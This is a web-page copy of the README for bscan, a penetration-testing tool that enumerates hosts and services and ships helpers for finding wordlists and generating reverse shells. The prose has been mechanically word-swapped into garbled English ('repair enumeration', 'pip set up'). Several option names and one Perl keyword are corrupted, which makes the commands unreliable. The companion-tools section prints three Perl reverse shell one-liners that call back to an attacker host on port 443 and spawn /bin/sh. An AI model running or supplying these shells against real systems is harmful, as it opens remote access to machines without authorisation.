Bscan – An Asynchronous Target Enumeration Tool

Bscan - An Asynchronous Target Enumeration Tool

bscan is a command-line utility to carry out energetic information gathering and repair enumeration. At its core, bscan asynchronously spawns processes of nicely-recognized scanning utilities, repurposing scan outcomes into highlighted console output and a nicely-outlined listing construction.

bscan was written to be run on
Kali Linux, however there may be nothing inherently stopping it from operating on any OS with the suitable instruments put in.
Download the most recent packaged model from PyPI:
Or get the bleeding-edge model from model management:

pip set up

Basic Usage
bscan has all kinds of configuration choices which can be utilized to tune scans to your wants. Here’s a fast instance:

$ bscan 
> --max-concurrency 3 
> --patterns [Mm]icrosoft 
> --status-interval 10 
> --verbose-standing 

What’s happening right here?

  • --max-concurrency 3 signifies that not more than Three concurrent scan subprocesses might be run at a time
  • --patterns [Mm]icrosoft defines a customized regex sample with which to focus on matches within the generated scan output
  • --status-interval 10 tells bscan to print runtime standing updates each 10 seconds
  • --verbose-standing signifies that every of those standing updates will print particulars of all at present-operating scan subprocesses
  • is the host upon which we wish to enumerate

bscan additionally depends on some further configuration recordsdata. The default recordsdata may be discovered within the bscan/configuation listing and serve the next functions:

  • patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan output
  • required-programs.txt specifies the put in packages that bscan plans on utilizing
  • port-scans.toml defines the port-discovering scans to be run on the goal(s), in addition to the regular expressions used to parse port numbers and repair names from scan output
  • service-scans.toml defines the scans be run on the goal(s) on a per-service foundation

Detailed Options
Here’s what you need to see when operating bscan --help:

utilization: bscan [OPTIONS] targets

| |__  ___  ___ __ _ _ __
| '_ / __|/ __/ _` | '_ 
| |_) __  (__ (_| | | | |
|_.__/|___/_____,_|_| |_|

an asynchronous service enumeration software

positional arguments:
  targets               the targets and/or networks on which to carry out enumeration

non-compulsory arguments:
  -h, --help            present this assist message and exit
  --brute-move-record F   filename of password record to make use of for brute-forcing
  --brute-consumer-record F   filename of consumer record to make use of for brute-forcing
  --cmd-print-width I   the utmost integer variety of characters allowed when printing
                        the command used to spawn a operating subprocess (defaults to 80)
  --config-dir D        the bottom listing from which to load the configuration recordsdata;
                        required configuration recordsdata lacking from this listing will
                        as an alternative be loaded from the default recordsdata shipped with this
  --hard                drive overwrite of current directories
  --max-concurrency I   most integer variety of subprocesses permitted to be operating
                        concurrently (defaults to 20)
  --no-program-verify    disable checking the presence of required system packages
  --no-file-verify       disable checking the presence of recordsdata reminiscent of configured
  --no-service-scans    disable operating scans on found companies
  --output-dir D        the bottom listing by which to put in writing output recordsdata
  --patterns [ [ ...]]  regex patterns to focus on in output textual content
  --ping-sweep          allow ping sweep filtering of hosts from a community vary
                        earlier than operating extra intensive scans
  --quick-solely          whether or not to solely run the fast scan (and never embody the
                        thorough scan over all ports)
  --qs-methodology S         the strategy for performing the preliminary TCP port scan; should
                        correspond to a configured port scan
  --status-interval I   integer variety of seconds to pause in between printing standing
                        updates; a non-optimistic worth disables updates (defaults to 30)
  --ts-methodology S         the strategy for performing the thorough TCP port scan; should
                        correspond to a configured port scan
  --udp                 whether or not to run UDP scans
  --udp-methodology S        the strategy for performing the UDP port scan; should correspond
                        to a configured port scan
  --verbose-standing      whether or not to print verbose runtime standing updates, based mostly on
                        frequency specified by `--status-interval` flag
  --version             program model
  --web-phrase-record F     the wordlist to make use of for scans

Companion Tools
The important bscan program ships with two utility packages (bscan-wordlists and bscan-shells) to make your life somewhat simpler when searching for wordlists and making an attempt to open reverse shells.
bscan-wordlists is a program designed for locating wordlist recordsdata on Kali Linux. It searches a number of default directories and permits for glob filename matching. Here’s a easy instance:

$ bscan-wordlists --find "*win*"

Try bscan-wordlists --help to discover different choices.
bscan-shells is a program that may generate quite a lot of reverse shell one-liners with goal and port fields populated for you. Here’s a easy instance to record all Perl-based shells, configured to attach again to on port 443:

$ bscan-shells --port 443 | grep -i -A1 perl
perl for home windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ whereas<>;'

perl with /bin/sh
perl -e 'use Socket;$i="";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(join(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl with out /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ whereas<>;'

Note that bscan-shells pulls these instructions from the reverse-shells.toml configuration file. Try bscan-shells --help to discover different choices.

Start by organising a brand new improvement surroundings and putting in the necessities (utilizing virtualenvwrapper / virtualenvwrapper-win):

# setup the surroundings
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev

# get the dept
pip set up -r dev-necessities.txt

Lint and sort-verify the venture (these are run on Travis, too):
When it is time to bundle a brand new launch:

# construct supply and wheel distributions
python bdist_wheel sdist

# run submit-construct checks
twine verify dist/*

# add to PyPI
twine add dist/*


Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.